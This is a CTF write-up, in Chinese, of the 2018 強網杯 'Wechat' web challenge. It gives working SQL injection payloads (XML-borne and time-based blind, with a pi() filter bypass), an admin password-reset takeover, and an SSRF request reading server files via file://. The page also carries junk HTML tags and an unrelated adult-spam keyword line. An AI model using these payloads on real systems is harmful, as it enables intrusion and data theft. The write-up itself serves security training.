<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    2018強網杯-Writeup
    展開或關閉
    web
    web簽到 Share your mind Three hit Wechat 教育機構 python is the best language
    pwn
    silent silent2 task_gettingStart_ktQeERc opm note
    re
    simple picture-lock hide baby_re

    Wechat

    2018強網杯-Writeup /

    Wechat

    出題人給出了公眾后后面的地址,查看微信公眾號的SDK可以發現可以通過一些xml數據進行發送

    import requests

url = "http://39.107.33.77/"
content = "Test http://www.baidu.com TEAMKEY icq3be93d38562e68bc0a86368c2d6b2"

data = '''
<xml>
   <ToUserName><![CDATA[a]]></ToUserName>
   <FromUserName><![CDATA[1',(select content from note limit 3,1))--]]></FromUserName> 
   <CreateTime>1348831860</CreateTime>
   <MsgType><![CDATA[text]]></MsgType>
   <Content><![CDATA[%s]]></Content>
   <MsgId>1234567890123456</MsgId>
   <AgentID>1</AgentID>
</xml>
''' % content

print requests.post(url,data=data).content

    通過提示存在注入,可以得到以下信息

    <xml>
<ToUserName><![CDATA[1',(select content from note limit 3,1))--]]></ToUserName>
<FromUserName><![CDATA[a]]></FromUserName>
<CreateTime>1521882365</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
<Content><![CDATA[Success!
Start Time:You can leave me message here: http://wc.qwb.com:8088/leave_message.php 
Over Time:Sat Mar 24 09:06:05 2018]]></Content>
<MsgId>1234567890123456</MsgId>
</xml>

    綁定host: wc.qwb.com 的ip為39.107.33.77
    []

    其中message存在注入,限制的比較嚴格

    POST /leave_message.php HTTP/1.1
Host: wc.qwb.com:8088

user=aaaaaaaaaaaaaaa&email=aaaa@qq.com&team=icq3be93d38562e68bc0a86368c2d6b2&message=1'-(sleep(ceil(pi())))-'1&submit=submit

    []

    比如sleep函數參數里面不能用數字,可以使用pi()來繞過,另外就是select from部分。

    message=12333'-(if(ascii(substring((select@b:=group_concat(username)from{cl0und.adminuser}),%s,1))like'%s',sleep(pi()),0))-'1

    這里字段都需要猜解,猜不到password字段

    http://wc.qwb.com:8088/forgetpassword.php

    利用密碼找回功能,注入出code,找回管理員密碼

    進入后臺后,發現有一段上傳處,主要用于用戶的頭像上傳。

    文件上傳后便會將圖片的內容顯示出來。

    Wechat

    再往后面看htm中有一段注釋。

    []
    其中urlink存在ssrf漏洞,沒有限制協議以及后面的字符,當然大部分的特殊符號不能用,只能讀取一些配置文件。

    POST /getimg.php HTTP/1.1
Host: wc.qwb.com:8088
Cookie: PHPSESSID=cjq7naar02kajivdftljhj2h44

------WebKitFormBoundaryOXFwabnsGhrKdxyn
Content-Disposition: form-data; name="urlink"

file://wc.qwb.com:8088/etc/apache2/apache2.conf
------WebKitFormBoundaryOXFwabnsGhrKdxyn--

    讀取到apache的配置文件,可以看到內容。很郁悶,比賽的時候讀取了這個文件,但是base64的內容沒取完整導致沒看到這部分,還是需要細心…

    #<Directory /home/qwbweb/backdoor>#       Port    23333#   Options Indexes FollowSymLinks#   AllowOverride None#   Require all granted#   Here is a Bin with its libc#</Directory>

    剩下的就是文件讀取pwn程序,然后pwnpwnpwn了,太菜了,不會做。

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    GQQQy
    資深作者 200 聲望
    老年二進制選手,副業虛擬機
    討論數量: 0
    只看當前版本


    暫無話題~
    ? 2021 WANGAN.COM 幫助網安從業者成長;關注產業發展,做網絡安全忠誠衛士!
    亚洲 欧美 自拍 唯美 另类